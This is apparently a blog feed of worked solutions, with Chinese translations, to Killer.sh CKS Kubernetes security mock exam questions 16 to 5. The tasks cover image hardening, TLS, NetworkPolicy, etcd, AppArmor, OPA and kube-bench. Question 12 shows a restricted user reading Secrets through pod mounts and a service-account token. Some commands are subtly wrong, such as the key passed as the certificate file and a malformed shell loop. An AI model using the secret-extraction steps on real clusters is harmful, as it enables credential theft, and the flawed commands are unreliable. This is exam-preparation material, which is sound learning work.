]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 16 | Docker Image Attack Surface /archives/kubernetes/CKS/image-attack-surface.html Task weight: 7%

Use context: kubectl config use-context workload-prod

There is a Deployment image-verify in Namespace team-blue which runs image registry.killer.sh:5000/image-verify:v1 . DevSecOps has asked you to improve this image by:

Changing the base image to alpine:3.12
Not installing curl
Updating nginx to use the version constraint >=1.18.0
Running the main process as user myuser

Do not add any new lines to the Dockerfile, just edit existing ones. The file is located at /opt/course/16/image/Dockerfile .

Tag your version as v2 . You can build, tag and push using:

cd /opt/course/16/image
podman build -t registry.killer.sh:5000/image-verify:v2 .
podman run registry.killer.sh:5000/image-verify:v2 # to test your changes
podman push registry.killer.sh:5000/image-verify:v2
Make the Deployment use your updated image tag v2.

译文

任务权重：7%

使用环境: kubectl config use-context workload-prod

名称空间 team-blue 中有一个部署 image-verify ，运行 image registry.killer.sh:5000/image-verify:v1 。

将基础镜像改为 alpine:3.12
不安装 curl
更新nginx以使用版本约束>=1.18.0
以用户myuser身份运行主进程

不要 在Docker文件中添加任何新行，只需编辑现有的行。该文件位于 /opt/course/16/image/Dockerfile 。

将你的版本标记为 v2 .你可以用以下方式构建、标记和推送。

cd /opt/course/16/image
podman build -t registry.killer.sh:5000/image-verify:v2 。
podman run registry.killer.sh:5000/image-verify:v2 # 来测试你的改变
podman push registry.killer.sh:5000/image-verify:v2

让部署使用你更新的图像标签 v2。

解答

备份编辑 dockerfile文件

cp /opt/course/16/image/Dockerfile Dockerfile.bak
vim Dockerfile

# /opt/course/16/image/Dockerfile
FROM alpine:3.4
RUN apk update && apk add vim curl nginx=1.10.3-r0
RUN addgroup -S myuser && adduser -S myuser -G myuser
COPY ./run.sh run.sh
RUN ["chmod", "+x", "./run.sh"]
USER root
ENTRYPOINT ["/bin/sh", "./run.sh"]

cat /opt/course/16/image/run.sh

# /opt/course/16/image/run.sh
while true; do date; id; echo; sleep 1; done

dockerfile 文件的内容为部署 alpine3.4 添加了 vim, curl,nginx, 添加了相关用户和组,循环执行 run.sh, 间隔1s输出时间和 id

image-attack-surface-0

根据题目进行修改

# /opt/course/16/image/Dockerfile

# 更改版本
FROM alpine:3.12

# 更改 删除curl
RUN apk update && apk add vim nginx>=1.18.0

RUN addgroup -S myuser && adduser -S myuser -G myuser
COPY ./run.sh run.sh
RUN ["chmod", "+x", "./run.sh"]

# 更改用户
USER myuser

ENTRYPOINT ["/bin/sh", "./run.sh"]

重新构建image 并执行

cd /opt/course/16/image
podman build -t registry.killer.sh:5000/image-verify:v2 .
podman run registry.killer.sh:5000/image-verify:v2

image-attack-surface-1

检查无误后进行push

podman push registry.killer.sh:5000/image-verify:v2

image-attack-surface-2

编辑deployment 使用更新的image

k -n team-blue edit deploy image-verify

# kubectl -n team-blue edit deploy image-verify
apiVersion: apps/v1
kind: Deployment
metadata:
...
spec:
...
  template:
...
    spec:
      containers:
      - image: registry.killer.sh:5000/image-verify:v2 # 更改

k -n team-blue logs -f -l id=image-verify

image-attack-surface-3

检查验证curl nginx

k -n team-blue exec image-verify-55fbcd4c9b-x2flc -- curl
k -n team-blue exec image-verify-55fbcd4c9b-x2flc -- nginx -v

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 15 | Configure TLS on Ingress /archives/kubernetes/CKS/TLS-ingress.html Task weight: 4%

Use context: kubectl config use-context workload-prod

In Namespace team-pink there is an existing Nginx Ingress resources named secure which accepts two paths /app and /api which point to different ClusterIP Services.

From your main terminal you can connect to it using for example:

HTTP: curl -v http://secure-ingress.test:31080/app
HTTPS: curl -kv https://secure-ingress.test:31443/app

Right now it uses a default generated TLS certificate by the Nginx Ingress Controller.

You’re asked to instead use the key and certificate provided at /opt/course/15/tls.key and /opt/course/15/tls.crt . As it’s a self-signed certificate you need to use curl -k when connecting to it.

译文

任务权重：4%。

使用环境: kubectl config use-context workload-prod

在命名空间 team-pink 中，有一个名为 secure 的 Nginx Ingress 资源，它接受两个路径 /app和 /api ，指向不同的ClusterIP服务。

从你的主终端，你可以使用比如说，连接到它。

HTTP: curl -v http://secure-ingress.test:31080/app
HTTPS: curl -kv https://secure-ingress.test:31443/app

现在，它使用由 Nginx Ingress Controller 默认生成的TLS证书。

要求你使用 /opt/course/15/tls.key 和 /opt/course/15/tls.crt 提供的密钥和证书。由于这是一个自签的证书，你需要在连接它时使用 curl -k 。

解答

检查域名与地址

k -n team-pink get ing secure
ping secure-ingress.test

TLS-ingress-0

访问测试,并检查证书

curl http://secure-ingress.test:31080/app
curl http://secure-ingress.test:31080/api
curl https://secure-ingress.test:31443/api
curl -k https://secure-ingress.test:31443/api
curl -kv https://secure-ingress.test:31443/api

TLS-ingress-1

使用证书创建 secret

k -n team-pink create secret tls tls-secret --key /opt/course/15/tls.crt --cert /opt/course/15/tls.crt
k -n team-pink get ing secure -oyaml > 15_ing_bak.yaml
k -n team-pink edit ing secure

# kubectl -n team-pink edit ing secure
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  annotations:
...
  generation: 1
  name: secure
  namespace: team-pink
...
spec:
  tls:                            # 添加
    - hosts:                      # 添加
      - secure-ingress.test       # 添加
      secretName: tls-secret      # 添加
  rules:
  - host: secure-ingress.test
    http:
      paths:
      - backend:
          service:
            name: secure-app
            port: 80
        path: /app
        pathType: ImplementationSpecific
      - backend:
          service:
            name: secure-api
            port: 80
        path: /api
        pathType: ImplementationSpecific
...

再次检查证书

curl -k https://secure-ingress.test:31443/api
curl -kv https://secure-ingress.test:31443/api

TLS-ingress-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 14 | Syscall Activity /archives/kubernetes/CKS/Syscall.html Task weight: 4%

Use context: kubectl config use-context workload-prod

There are Pods in Namespace team-yellow . A security investigation noticed that some processes running in these Pods are using the Syscall kill , which is forbidden by a Team Yellow internal policy.

Find the offending Pod(s) and remove these by reducing the replicas of the parent Deployment to 0.

译文

任务权重：4%。

使用环境: kubectl config use-context workload-prod

名称空间 team-yellow 中有一些 Pod。一项安全调查发现，在这些 Pod 中运行的一些进程正在使用 Syscall kill ，这是 Team Yellow 的内部政策所禁止的。

找到违规的Pod，并通过将父部署的副本减少到0来删除这些Pod。

参考

https://man7.org/linux/man-pages/man2/syscalls.2.html

解答

检查 ns team-yellow在哪个节点运行

k -n team-yellow get pod -owide

Syscall-0

进入node1 找到第一个部署的进程, 流程: Pod name -> ContainerID　－＞　processID　－＞　strace跟踪

ssh cluster1-node1

crictl pods --name collector1
crictl ps --pod 21aacb8f4ca8d
crictl inspect 9ea02422f8660 | grep args -A1

Syscall-1

ps aux | grep collector1-process
strace -p 35039

Syscall-2
Syscall-3

以此类推分别检查另外2个

ps aux | grep collector2-process
strace -p 35375

Syscall-4

ps aux | grep collector3-process
strace -p 35155

Syscall-5

2 和 3 都正常 ,collector1 有 syscall 记录, 缩容到0

k -n team-yellow scale deploy collector1 --replicas 0

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 13 | Restrict access to Metadata Server /archives/kubernetes/CKS/NetworkPolicy-3.html Task weight: 7%

Use context: kubectl config use-context infra-prod

There is a metadata service available at http://192.168.100.21:32000 on which Nodes can reach sensitive data, like cloud credentials for initialisation. By default, all Pods in the cluster also have access to this endpoint. The DevSecOps team has asked you to restrict access to this metadata server.

In Namespace metadata-access :

Create a NetworkPolicy named metadata-deny which prevents egress to 192.168.100.21 for all Pods but still allows access to everything else
Create a NetworkPolicy named metadata-allow which allows Pods having label role: metadata-accessor to access endpoint 192.168.100.21

There are existing Pods in the target Namespace with which you can test your policies, but don’t change their labels.

译文

任务权重 7%

使用上下文: kubectl config use-context infra-prod

在 http://192.168.100.21:32000 ，有一个元数据服务，节点可以接触到敏感数据，如初始化的云证书。默认情况下，集群中的所有Pod也可以访问这个端点。DevSecOps团队已经要求你限制对这个元数据服务器的访问。

在命名空间 metadata-access 。

创建一个名为 metadata-deny 的 NetworkPolicy，阻止所有Pod出口到 192.168.100.21 ，但仍然允许访问其他所有东西。
创建一个名为 metadata-allow 的 NetworkPolicy，允许具有标签角色的 Pod：metadata-accessor 访问端点192.168.100.21。

在目标命名空间中有现有的Pod，你可以用它来测试你的策略，但不要改变它们的标签。

解答

容器内访问 http://192.168.100.21:32000

for i in `k -n metadata-access get pod -o name`; do echo $i ; k -n metadata-access exec $i -- curl -s http://192.168.100.21:32000 ; done

NetworkPolicy-3-0

创建networkpolicy

vim 13_metadata-deny.yaml

# 13_metadata-deny.yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: metadata-deny
  namespace: metadata-access
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 192.168.100.21/32

k -f 13_metadata-deny.yaml apply

NetworkPolicy-3-1

创建第二个networkpolicy

vim 13_metadata-allow.yaml

vim 13_metadata-allow.yaml

# 13_metadata-allow.yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: metadata-allow
  namespace: metadata-access
spec:
  podSelector:
    matchLabels:
      role: metadata-accessor
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 192.168.100.21/32

k -f 13_metadata-allow.yaml apply

NetworkPolicy-3-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 12 | Hack Secrets /archives/kubernetes/CKS/hack-secret.html Task weight: 8%

Use context: kubectl config use-context restricted@infra-prod

You’re asked to investigate a possible permission escape in Namespace restricted . The context authenticates as user restricted which has only limited permissions and shouldn’t be able to read Secret values.

Try to find the password-key values of the Secrets secret1 , secret2 and secret3 in Namespace restricted . Write the decoded plaintext values into files /opt/course/12/secret1 , /opt/course/12/secret2 and /opt/course/12/secret3 .

译文

任务权重: 8%

使用上下文: kubectl config use-context restricted@infra-prod

你被要求调查 Namespace restricted 中可能存在的权限逃逸问题。该上下文以用户 restricted 身份进行认证，该用户只有有限的权限，不应该读取 Secret 值。

试着在名字空间 restricted 中找到 secret1 、secret2 和 secret3 的密码-密钥值。将解码后的明文值写入文件 /opt/course/12/secret1 、/opt/course/12/secret2 和 /opt/course/12/secret3 中。

解答

列出所有

k -n restricted get all

hack-secret-0

查看pod1 发现挂载路径有secret

k -n restricted describe pod pod1-5cbc4bfd57-sl42h

hack-secret-1

k -n restricted exec  pod1-5cbc4bfd57-sl42h -- ls /etc/secret-volume/
k -n restricted exec  pod1-5cbc4bfd57-sl42h -- cat /etc/secret-volume/password
k -n restricted exec  pod1-5cbc4bfd57-sl42h -- cat /etc/secret-volume/password > /opt/course/12/secret1

hack-secret-2

查找pod2 的secret

k -n restricted describe pod pod2-7d85f59c98-zqtbl

hack-secret-3

k -n restricted exec pod2-7d85f59c98-zqtbl -- env
echo an-amazing > /opt/course/12/secret2

hack-secret-4

查找pod3 secret

k -n restricted describe pod pod3-5c577bbf8d-hghrs

hack-secret-5

进入到容器中检查下

k -n restricted exec -it pod3-5c577bbf8d-hghrs -- sh

ls /var/run/secrets/kubernetes.io/serviceaccount

hack-secret-6

使用token获取secret

curl https://kubernetes.default/api/v1/namespaces/restricted/secrets -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" -k

hack-secret-7

echo cEVuRXRSYVRpT24tdEVzVGVSCg== | base64 -d > /opt/course/12/secret3

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 11 | Secrets in ETCD /archives/kubernetes/CKS/etcd-secret.html Task weight: 7%

Use context: kubectl config use-context workload-prod

There is an existing Secret called database-access in Namespace team-green .

Read the complete Secret content directly from ETCD (using etcdctl ) and store it into /opt/course/11/etcd-secret-content . Write the plain and decoded Secret’s value of key “pass” into /opt/course/11/database-password .

译文

任务权重：7%。

使用环境：kubectl config use-context workload-prod

在命名空间 team-green 中有一个名为 data-access 的现有 Secret。

直接从 ETCD 读取完整的 Secret 内容（使用 etcdctl ），并将其存储到 /opt/course/11/etcd-secret-content 。在/opt/course/11/database-password 中写入纯文本和解码的Secret的密钥 “pass “的值。

解答

进入控制节点,然后检查是否安装了etcdctl

ssh cluster1-controlplane1

etcdctl

查询证书密钥相关的文件

cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep etcd

输出结果
    - --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
    - --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
    - --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
    - --etcd-servers=https://127.0.0.1:2379 # optional since we're on same node

通过上面的结果进行secret的查询

ETCDCTL_API=3 etcdctl \
--cert /etc/kubernetes/pki/apiserver-etcd-client.crt \
--key /etc/kubernetes/pki/apiserver-etcd-client.key \
--cacert /etc/kubernetes/pki/etcd/ca.crt get /registry/secrets/team-green/database-access

查询路径 /registry/{type}/{namespace}/{name}

把结果写入文件

# /opt/course/11/etcd-secret-content
/registry/secrets/team-green/database-access
k8s

v1Secret

database-access
team-green"*$3e0acd78-709d-4f07-bdac-d5193d0f2aa32bB
0kubectl.kubernetes.io/last-applied-configuration{"apiVersion":"v1","data":{"pass":"Y29uZmlkZW50aWFs"},"kind":"Secret","metadata":{"annotations":{},"name":"database-access","namespace":"team-green"}}
z
kubectl-client-side-applyUpdatevFieldsV1:
{"f:data":{".":{},"f:pass":{}},"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:type":{}}
pass
    confidentialOpaque"

解码pass的值并写入文件

echo Y29uZmlkZW50aWFs | base64 -d > /opt/course/11/database-password

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 10 | Container Runtime Sandbox gVisor /archives/kubernetes/CKS/sandbox-gVisor-1.html Task weight: 4%

Use context: kubectl config use-context workload-prod

Team purple wants to run some of their workloads more secure. Worker node cluster1-node2 has container engine containerd already installed and it’s configured to support the runsc/gvisor runtime.

Create a RuntimeClass named gvisor with handler runsc .

Create a Pod that uses the RuntimeClass. The Pod should be in Namespace team-purple , named gvisor-test and of image nginx:1.19.2 . Make sure the Pod runs on cluster1-node2 .

Write the dmesg output of the successfully started Pod into /opt/course/10/gvisor-test-dmesg .

译文

任务权重：4%。

使用环境: kubectl config use-context workload-prod

Purple团队希望更安全地运行他们的一些工作负载。工作节点 cluster1-node2 已经安装了容器引擎 containerd ，它被配置为支持 runsc/gvisor 运行时。

创建一个名为 gvisor 的 RuntimeClass，处理程序为 runsc 。

创建一个使用该 RuntimeClass 的 Pod 。这个 Pod 应该在命名空间 team-purple 中，命名为 gvisor-test ，镜像为 nginx:1.19.2 。确保该 Pod 运行在 cluster1-node2 上。

将成功启动的 Pod 的 dmesg 输出写入 /opt/course/10/gvisor-test-dmesg 。

解答

查看节点,并登陆远程节点检查runsc版本和配置

k get node -o wide
ssh cluster1-node2

runsc --version
grep runsc/etc/containerd/config.toml

sandbox-gVisor-1-0

创建一个RuntimeCLasses文件,并创建

vim 10_rtc.yaml

# 10_rtc.yaml
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc

k -f 10_rtc.yaml create

创建一个pod

k -n team-purple run gvisor-test --image=nginx:1.19.2 $do > 10_pod.yaml

vim 10_pod.yaml

# 10_pod.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: gvisor-test
  name: gvisor-test
  namespace: team-purple
spec:
  nodeName: cluster1-node2   # 添加
  runtimeClassName: gvisor   # 添加
  containers:
  - image: nginx:1.19.2
    name: gvisor-test
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}

k -f 10_pod.yaml create

检查pod运行情况和日志并把日志写入文件

k -n team-purple get pod gvisor-test
k -n team-purple exec gvisor-test -- dmesg
k -n team-purple exec gvisor-test > /opt/course/10/gvisor-test-dmesg -- dmesg

sandbox-gVisor-1-1

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 9 | AppArmor Profile /archives/kubernetes/CKS/AppArmor-2.html Task weight: 3%

Use context: kubectl config use-context workload-prod

Some containers need to run more secure and restricted. There is an existing AppArmor profile located at /opt/course/9/profile for this.

Install the AppArmor profile on Node cluster1-node1 . Connect using ssh cluster1-node1 .
Add label security=apparmor to the Node
Create a Deployment named apparmor in Namespace default with:
- One replica of image nginx:1.19.2
- NodeSelector for security=apparmor
- Single container named c1 with the AppArmor profile enabled

The Pod might not run properly with the profile enabled. Write the logs of the Pod into /opt/course/9/logs so another team can work on getting the application running.

译文

任务权重：3%。

使用环境: kubectl config use-context workload-prod

有些容器需要更安全地运行，并受到限制。在 /opt/course/9/profile 中有一个现有的AppArmor 配置文件，用于此。

在node cluster1-node1 上安装 AppArmor 配置文件。使用 ssh cluster1-node1 连接。
在节点上添加标签 security=apparmor
在名称空间 default 中创建一个名为 apparmor 的 Deployment ，其中包括。
- image 为 nginx:1.19.2
- NodeSelector 为 security=apparmor
- 启用AppArmor配置单一容器名为 c1

启用配置文件后，Pod可能无法正常运行。将Pod的日志写入 /opt/course/9/logs ，这样另一个团队就可以努力让应用程序运行。

参考

https://kubernetes.io/docs/tutorials/clusters/apparmor

解答

1

检查配置文件, 并把配置文件复制到要部署的节点

vim /opt/course/9/profile

# /opt/course/9/profile 

#include 

profile very-secure flags=(attach_disconnected) {
  #include 

  file,

  # Deny all file writes.
  deny /` w,
}

scp /opt/course/9/profile cluster1-node1:~/

登陆cluster1-node1 进行部署 apparmor配置文件

ssh cluster1-node1

apparmor_parser -q profile
apparmor_status | grep very-secure #检查是否正常

2

检查node标签,并给node打标签

k label -h
k get node --show-labels
k label node cluster1-node1 security=apparmor

3

创建一个deploy 配置文件并进行编辑

k create deploy apparmor --image=nginx:1.19.2 $do > 9_deploy.yaml

vim 9_deploy.yaml

# 9_deploy.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    app: apparmor
  name: apparmor
  namespace: default
spec:
  replicas: 1
  selector:
    matchLabels:
      app: apparmor
  strategy: {}
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: apparmor
      annotations:                                                                 # 添加
        container.apparmor.security.beta.kubernetes.io/c1: localhost/very-secure   # 添加
    spec:
      nodeSelector:                    # 添加
        security: apparmor             # 添加
      containers:
      - image: nginx:1.19.2
        name: c1                       # 更改
        resources: {}

创建deploy

k -f 9_deploy.yaml create

检查调度情况和日志,已调度到对应节点,

k get pod -owide | grep apparmor
k logs apparmor-85c65645dc-w852p
k logs apparmor-85c65645dc-jbch8 > /opt/course/9/logs

AppArmor-2-0

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 8 | Secure Kubernetes Dashboard /archives/kubernetes/CKS/dashboard-sec.html Task weight: 3%

Use context: kubectl config use-context workload-prod

The Kubernetes Dashboard is installed in Namespace kubernetes-dashboard and is configured to:

Allow users to “skip login”
Allow insecure access (HTTP without authentication)
Allow basic authentication
Allow access from outside the cluster

You are asked to make it more secure by:

Deny users to “skip login”
Deny insecure access, enforce HTTPS (self signed certificates are ok for now)
Add the --auto-generate-certificates argument
Enforce authentication using a token (with possibility to use RBAC)
Allow only cluster internal access

译文

任务权重：3%。

使用环境: kubectl config use-context workload-prod

Kubernetes Dashboard 安装在命名空间 kubernetes-dashboard 中，并被配置为。

允许用户 “跳过登录”。
允许不安全的访问（无认证的HTTP）。
允许基本认证
允许从集群外访问

要求你通过以下方式使其更加安全。

拒绝用户 “跳过登录”。
拒绝不安全的访问，强制执行HTTPS（自签名的证书目前还可以）。
添加–自动生成证书的参数
使用令牌强制认证（可以使用RBAC）。
只允许集群内部访问

解答

检查命名空间 kubernetes-dashboard

k -n kubernetes-dashboard get pod,svc
k get node -o wide

dashboard-sec-0
dashboard-sec-1

修复: 备份 deploy 配置后进行编辑

k -n kubernetes-dashboard get deploy kubernetes-dashboard -oyaml > 8_deploy_kubernetes-dashboard.yaml

k -n kubernetes-dashboard edit deploy kubernetes-dashboard

template:
  spec:
    containers:
    - args:
      - --namespace=kubernetes-dashboard  
      - --authentication-mode=token        # 删除或设置为token
      - --auto-generate-certificates       # 添加
      #- --enable-skip-login=true          # 删除或设置为false
      #- --enable-insecure-login           # 删除
      image: kubernetesui/dashboard:v2.0.3
      imagePullPolicy: Always
      name: kubernetes-dashboard

备份 svc配置后编辑

k -n kubernetes-dashboard get svc kubernetes-dashboard -o yaml > 8_svc_kubernetes-dashboard.yaml

k -n kubernetes-dashboard edit svc kubernetes-dashboard

 spec:
  clusterIP: 10.107.176.19
  externalTrafficPolicy: Cluster   # delete
  internalTrafficPolicy: Cluster
  ports:
  - name: http
    nodePort: 32513                # delete
    port: 9090
    protocol: TCP
    targetPort: 9090
  - name: https
    nodePort: 32441                # delete
    port: 443
    protocol: TCP
    targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
  sessionAffinity: None
  type: ClusterIP                  # change or delete
status:
  loadBalancer: {}

验证: 新建一个容器进行模拟访问, curl -k 是忽略证书

dashboard-sec-2

k run tmp --image=nginx:1.19.2 --restart=Never --rm -it -- bash

curl https://kubernetes-dashboard.kubernetes-dashboard
curl -k https://kubernetes-dashboard.kubernetes-dashboard

dashboard-sec-3

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 7 | Open Policy Agent /archives/kubernetes/CKS/open-policy-agent.html Task weight: 6%

Use context: kubectl config use-context infra-prod

The Open Policy Agent and Gatekeeper have been installed to, among other things, enforce blacklisting of certain image registries. Alter the existing constraint and/or template to also blacklist images from very-bad-registry.com .

Test it by creating a single Pod using image very-bad-registry.com/image in Namespace default , it shouldn’t work.

You can also verify your changes by looking at the existing Deployment untrusted in Namespace default , it uses an image from the new untrusted source. The OPA contraint should throw violation messages for this one.

译文

任务权重：6%。

使用环境: kubectl config use-context infra-prod

Open Policy Agent 和 Gatekeeper 已安装，除其他外，强制将某些图像登记处列入黑名单。改变现有的约束和/或模板，将来自 very-bad-registry.com 的 images 也列入黑名单。

通过使用 default 名称空间的图像 very-bad-registry.com/image 创建一个单一pod来测试，它不应该工作。

你也可以通过查看 Namespace default 中现有的 Deployment untrusted 来验证你的变化，它使用了来自新的不可信任的来源的图像。OPA限制应该为这个问题抛出违规信息。

解答

kubectl config use-context infra-prod

检查OPA约束

k get crd

k get constraint
k edit constrainttemplates blacklistimages

# kubectl edit constrainttemplates blacklistimages
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
...
spec:
  crd:
    spec:
      names:
        kind: BlacklistImages
  targets:
  - rego: |
      package k8strustedimages

      images {
        image := input.review.object.spec.containers[_].image
        not startswith(image, "docker-fake.io/")
        not startswith(image, "google-gcr-fake.com/")
        not startswith(image, "very-bad-registry.com/") #添加这一行
      }

      violation[{"msg": msg}] {
        not images
        msg := "not trusted image!"
      }
    target: admission.k8s.gatekeeper.sh

检查是否生效

k run opa-test --image=very-bad-registry.com/image

open-policy-agent-0

过一段时间检查,另外两个pod已被列为违规

k describe blacklistimages pod-trusted-images

open-policy-agent-1

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 6 | Verify Platform Binaries /archives/kubernetes/CKS/verify-binaries.html Task weight: 2%

(can be solved in any kubectl context)

There are four Kubernetes server binaries located at /opt/course/6/binaries . You’re provided with the following verified sha512 values for these:

kube-apiserver f417c0555bc0167355589dd1afe23be9bf909bf98312b1025f12015d1b58a1c62c9908c0067a7764fa35efdac7016a9efa8711a44425dd6692906a7c283f032c

kube-controller-manager 60100cc725e91fe1a949e1b2d0474237844b5862556e25c2c655a33boa8225855ec5ee22fa4927e6c46a60d43a7c4403a27268f96fbb726307d1608b44f38a60

kube-proxy 52f9d8ad045f8eee1d689619ef8ceef2d86d50c75a6a332653240d7ba5b2a114aca056d9e513984ade24358c9662714973c1960c62a5cb37dd375631c8a614c6

kubelet 4be40f2440619e990897cf956c32800dc96c2c983bf64519854a3309fa5aa21827991559f9c44595098e27e6f2ee4d64a3fdec6baba8a177881f20e3ec61e26c

Delete those binaries that don’t match with the sha512 values above.

译文

任务权重：2%

(可以在任何kubectl环境下解决)

有四个Kubernetes服务器二进制文件，位于 /opt/course/6/binaries 。你会得到以下这些经过验证的sha512值。

kube-apiserver f417c0555bc0167355589dd1afe23be9bf909bf98312b1025f12015d1b58a1c62c9908c0067a7764fa35efdac7016a9efa8711a44425dd6692906a7c283f032c

kube-controller-manager 60100cc725e91fe1a949e1b2d0474237844b5862556e25c2c655a33boa8225855ec5ee22fa4927e6c46a60d43a7c4403a27268f96fbb726307d1608b44f38a60

kube-proxy 52f9d8ad045f8eee1d689619ef8ceef2d86d50c75a6a332653240d7ba5b2a114aca056d9e513984ade24358c9662714973c1960c62a5cb37dd375631c8a614c6

kubelet 4be40f2440619e990897cf956c32800dc96c2c983bf64519854a3309fa5aa21827991559f9c44595098e27e6f2ee4d64a3fdec6baba8a177881f20e3ec61e26c

删除那些与上述sha512值不匹配的二进制文件。

解答

这是个送分题, 验证文件的hash值,删除不匹配的文件可以把上面的哈希字符串全部写入一个文件 hash.txt

#hash.txt
f417c0555bc0167355589dd1afe23be9bf909bf98312b1025f12015d1b58a1c62c9908c0067a7764fa35efdac7016a9efa8711a44425dd6692906a7c283f032c
60100cc725e91fe1a949e1b2d0474237844b5862556e25c2c655a33boa8225855ec5ee22fa4927e6c46a60d43a7c4403a27268f96fbb726307d1608b44f38a60
52f9d8ad045f8eee1d689619ef8ceef2d86d50c75a6a332653240d7ba5b2a114aca056d9e513984ade24358c9662714973c1960c62a5cb37dd375631c8a614c6
4be40f2440619e990897cf956c32800dc96c2c983bf64519854a3309fa5aa21827991559f9c44595098e27e6f2ee4d64a3fdec6baba8a177881f20e3ec61e26c

通过脚本方式进行批量匹配,hash匹配的文件会显示,没有匹配到的为hash更改的

for i in `cat hash.txt`;done sha512sum /opt/course/6/binaries/* | grep $i ; done

verify-binaries-0

删除文件

rm -rf /opt/course/6/binaries/kube-controller-manager
rm -rf /opt/course/6/binaries/kubelet

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 5 | CIS Benchmark /archives/kubernetes/CKS/kube-benc-2.html Task weight: 3%

Use context: kubectl config use-context infra-prod

You’re ask to evaluate specific settings of cluster2 against the CIS Benchmark recommendations. Use the tool kube-bench which is already installed on the nodes.

Connect using ssh cluster2-controlplane1 and ssh cluster2-node1 .

On the master node ensure (correct if necessary) that the CIS recommendations are set for:

The --profiling argument of the kube-controller-manager
The ownership of directory /var/lib/etcd

On the worker node ensure (correct if necessary) that the CIS recommendations are set for:

The permissions of the kubelet configuration /var/lib/kubelet/config.yaml
The --client-ca-file argument of the kubelet

译文

任务重量：3%。

使用环境: kubectl config use-context infra-prod

你被要求根据CIS Benchmark的建议来评估 cluster2 的具体设置。使用已经安装在各节点上的工具 kube-bench 。

使用 ssh cluster2-controlplane1 和 ssh cluster2-node1 连接。

在主节点上确保（必要时纠正）已按CIS建议进行设置。

kube-controller-manager 的 --profiling 参数
目录 /var/lib/etcd 的权限

在工作节点上，确保（如有必要，请纠正）已按CIS建议进行设置：。

kubelet配置的权限 /var/lib/kubelet/config.yaml
kubelet 的 --client-ca-file 参数

解答

对master进行检查

ssh cluster2-controlplane1
kube-bench run --targets=master

1

通过关键字进行查找

kube-bench run --targets=master | grep "kube-controller-manager" -A 3

kube-benc-2-0

编辑配置文件

vim /etc/kubernetes/manifests/kube-controller-manager.yaml

# /etc/kubernetes/manifests/kube-controller-manager.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    component: kube-controller-manager
    tier: control-plane
  name: kube-controller-manager
  namespace: kube-system
spec:
  containers:
  - command:
    - kube-controller-manager
    - --allocate-node-cidrs=true
    - --authentication-kubeconfig=/etc/kubernetes/controller-manager.conf
    - --authorization-kubeconfig=/etc/kubernetes/controller-manager.conf
    - --bind-address=127.0.0.1
    - --client-ca-file=/etc/kubernetes/pki/ca.crt
    - --cluster-cidr=10.244.0.0/16
    - --cluster-name=kubernetes
    - --cluster-signing-cert-file=/etc/kubernetes/pki/ca.crt
    - --cluster-signing-key-file=/etc/kubernetes/pki/ca.key
    - --controllers=*,bootstrapsigner,tokencleaner
    - --kubeconfig=/etc/kubernetes/controller-manager.conf
    - --leader-elect=true
    - --node-cidr-mask-size=24
    - --port=0
    - --requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
    - --root-ca-file=/etc/kubernetes/pki/ca.crt
    - --service-account-private-key-file=/etc/kubernetes/pki/sa.key
    - --service-cluster-ip-range=10.96.0.0/12
    - --use-service-account-credentials=true
    - --profiling=false            # 添加

pod重新运行以后再次进行检查,已经修复

kube-bench run --targets=master | grep kube-controller -A 3
kube-bench run --targets=master | grep 1.3.2

2

查看 /var/lib/etcd 的权限

ll /var/lib/etcd

kube-benc-2-1

权限为root:root, 需要设置为 etcd:etcd

chown -R etcd:etcd /var/lib/etcd  #设置文件夹权限为etcd:etcd

3

切换到 cluster2-node1 ,对node进行检查

ssh cluster2-node1

kube-bench run --targets=node

检查 /var/lib/kubelet/config.yaml 权限,权限为777,需要修改权限为644

ll /var/lib/kubelet/config.yaml
chmod 644 /var/lib/kubelet/config.yaml

4

检查 client-ca-file

kube-bench run --targets=node | grep client-ca-file

验证时通过的,无需修改

kube-benc-2-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 模拟真题 Killer.sh | Question 4 | Pod Security Standard /archives/kubernetes/CKS/pod-sec.html Task weight: 8%

Use context: kubectl config use-context workload-prod

